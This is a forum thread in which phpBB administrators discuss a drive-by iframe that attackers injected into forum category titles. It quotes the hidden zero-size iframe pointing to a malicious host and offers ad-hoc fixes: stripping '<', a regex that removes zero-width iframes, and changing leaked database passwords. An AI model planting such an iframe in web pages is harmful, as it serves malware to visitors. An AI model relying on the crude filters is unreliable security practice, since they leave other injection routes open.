[問題] 我的論壇會跳ObscuredHtml.B病毒

[ETERNAL]

我的已經更新到2.0.15
但是這兩星期遇到\r
這樣的情形兩次了
<iframe src="http://gamania.go.zccn.net/x/hinet.htm" width=0 height=0 frameborder=0></iframe>

首頁被放入這樣的東西
不知道是如何被植入,有辦法直接針對這個漏洞做更新嗎?

[ETERNAL]

在改善這問題前
提供一下我防範方法
在index.php裡面\r
把

代碼: 選擇全部

$category_rows[$i]['cat_title']

改成

代碼: 選擇全部

str_replace("<","",$category_rows[$i]['cat_title'])

其他的

代碼: 選擇全部

$forum_data[$j]['forum_name']

代碼: 選擇全部

$forum_data[$j]['forum_desc']

也是一樣改法,以此類推\r

可以有效防止瀏覽器讀入

代碼: 選擇全部

<iframe>

[~倉木麻衣~]

不過這樣子就不能在版面說明使用其它的html語法了
其實可以考慮用preg_replace()來將整個寬度為0的iframe置換成空字串\r
例如底下的例子

代碼: 選擇全部

	$str = '版<IFrame src="http://gamania.go.zccn.net/x/hinet.htm" width=0 height=0 frameborder=0></iframe>面說<iframe src="http://gamania.go.zccn.net/x/hinet.htm" width=0 height=0 frameborder=0></iframe>明';
	$str = preg_replace("/<iframe(.*?)width=[\"']?0[\"']?(.*?)><\/iframe>/im", '', $str);
	echo $str;

[ETERNAL]

恩\r
替換掉為0的iframe也是可以
我覺得不讓瀏覽器讀入<是比較安全的做法
個人經驗以前寫聊天室時有遇到過

代碼: 選擇全部

<script src=病毒位置>

或者

代碼: 選擇全部

<img src=病毒位置>

只要是能讓瀏覽器讀取病毒位置的html語法.......基本上都有危險...

[t2737986]

嗯嗯...你的資料庫密碼外洩了...那個不是寫到檔案..是直接從資料庫下手...
更新為英數亂碼的密碼....還有主機內的所有帳號密碼通通改掉吧...
PS: 有更改過資料庫密碼 config.php 檔裡面的密碼也要改喔..不然會造成無法連結資料庫..因為 config.php 跟資料庫的密碼不對..試試吧...祝好運...

[ETERNAL]

嗯嗯...你的資料庫密碼外洩了...那個不是寫到檔案..是直接從資料庫下手...
更新為英數亂碼的密碼....還有主機內的所有帳號密碼通通改掉吧...
PS: 有更改過資料庫密碼 config.php 檔裡面的密碼也要改喔..不然會造成無法連結資料庫..因為 config.php 跟資料庫的密碼不對..試試吧...祝好運...

應該不是\r
去google查詢一下
有不少網站遇害,遇害的論壇有vbb跟phpbb兩種
http://www.google.com.tw/search?q=gaman ... art=0&sa=N

我猜想應該也是跟之前一樣\r
利用搜尋引擎,在網路上找尋vbb跟phpbb論壇,找漏洞下手
應該要盡快找出漏洞修正

[風中的雨]

謝謝提供解決方法

不過有個問題
替換$category_rows[$i]['cat_title'] 代碼，畫面沒什麼變化
但如果連$forum_data[$j]['forum_name']及$forum_data[$j]['forum_desc']都替換的話，論壇的畫面就會變得很奇怪，所有的版面名稱都會變成該分區的分區名稱，這有方法改善嗎？
或者只要替換$category_rows[$i]['cat_title'] 代碼就可以了？

[johnkk]

一般來說 會在首頁連結病毒 都是在首頁的主題分類的地方 被不明人士加入了
連結...可到版面管理找尋 那個版面被加入了不明連結~~
為何會被加入 我猜想是大家都喜歡把 phpmyadmin 放在網頁上又不加以保護\r
才會讓不明人士 可以順利在資料庫中加入不明連結...